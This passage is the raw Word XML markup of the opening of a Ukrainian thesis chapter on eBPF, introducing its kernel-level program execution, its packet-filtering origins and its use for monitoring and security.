        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>РОЗДІЛ 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00172EF0" w:rsidRPr="00172EF0" w:rsidRDefault="00172EF0" w:rsidP="00172EF0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ОСНОВИ ТЕХНОЛОГІЇ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00172EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00172EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>BPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRDefault="00BC794C" w:rsidP="00172EF0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D0623D" w:rsidRPr="00172EF0" w:rsidRDefault="00172EF0" w:rsidP="00172EF0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1. Принципи роботи </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D0623D" w:rsidRDefault="00D0623D" w:rsidP="00D0623D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="003F45FE" w:rsidP="00BC794C">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3F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В останні роки технологія </w:t>
      </w:r>
      <w:r w:rsidR="0005354B" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ex</w:t>
      </w:r>
      <w:r w:rsidR="0005354B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>tended Berkeley Packet Filter</w:t>
      </w:r>
      <w:r w:rsidR="0005354B" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0005354B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">далі – </w:t>
      </w:r>
      <w:r w:rsidR="0005354B" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> набула значного поширення завдяки своїм можливостям з покращення безпеки, продуктивності та ефективності операційних систем</w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (далі – ОС)</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, зокрема в умовах високонавантажених середовищ. Спочатку eBPF був розроблений для фільтрації мережевих пакетів у Unix-подібних </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, однак його функціональність швидко розширилась до більш широких задач, таких як моніторинг, трасування, управління мережевими підключеннями та безпека</w:t>
      </w:r>
      <w:r w:rsidRPr="003F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”,- [1]</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="003F45FE" w:rsidRDefault="003F45FE" w:rsidP="00BC794C">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sidRPr="003F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Принцип роботи eBPF базується на можливості виконувати невеликі програми </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(далі – ПЗ)</w:t>
      </w:r>
      <w:r w:rsidR="003560E6" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">безпосередньо в ядрі </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>. Це дозволяє розробникам впроваджувати нові функції або механізми моніторингу, не змінюючи основний код ядра, що робить eBPF гнучким і безпечним інструментом для вирішення складних завдань у реальному часі. Водночас, цей підхід дозволяє уникнути значних навантажень на систему, що є важливою перевагою для підтримки стабіль</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ності та високої продуктивності</w:t>
      </w:r>
      <w:r w:rsidRPr="003F45FE">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eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>,- [</w:t>
      </w:r>
      <w:r w:rsidRPr="003F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00BC794C" w:rsidP="00BC794C">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BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">У цьому розділі буде розглянуто основні принципи роботи eBPF, його архітектуру, типи </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, процес їх виконання в ядрі </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, а також основні переваги використання цієї технології. Розкриття цих аспектів допоможе краще зрозуміти, як eBPF може бути використано для вдосконалення сучасних ІТ-систем, зокрема в контексті безпеки, моніторингу та управління мережевими ресурсами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="003F45FE" w:rsidP="00BC794C">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3F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:r w:rsidR="007372C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">це потужна технологія, яка дозволяє виконувати програми в ядрі </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00BF4687" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">без необхідності змінювати сам код ядра. Спочатку розроблений для фільтрації пакетів у мережевих інтерфейсах, eBPF розширив своє застосування до моніторингу, відстеження подій, безпеки, управління </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ресурсами та інших аспектів функціонування </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. В основі роботи eBPF </w:t>
      </w:r>
      <w:r w:rsidR="003F3C0B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(Рис.1</w:t>
      </w:r>
      <w:r w:rsidRPr="003F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.1.</w:t>
      </w:r>
      <w:r w:rsidR="003F3C0B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>лежить механізм виконання програм у ядрі, який дозволяє обробляти інформацію без значного навантаження на систему</w:t>
      </w:r>
      <w:r w:rsidRPr="003F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [1]</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="003F45FE" w:rsidP="00BC794C">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3F45FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF працює в рамк</w:t>
      </w:r>
      <w:r w:rsidR="007372C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ах двох основних компонентів: eBPF-програми і eBPF-карта (map)</w:t>
      </w:r>
      <w:r w:rsidRPr="003F45FE">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eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, - [2]</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="007372C7" w:rsidP="00BC794C">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BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
